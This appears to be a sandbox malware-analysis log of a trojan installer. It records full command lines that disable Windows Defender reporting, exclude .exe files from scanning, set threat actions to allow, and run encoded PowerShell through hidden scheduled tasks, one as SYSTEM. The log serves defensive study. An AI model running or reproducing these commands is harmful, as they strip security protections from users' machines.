Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /FJump to behavior
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS2607.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winEXE@89/15@2/0
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
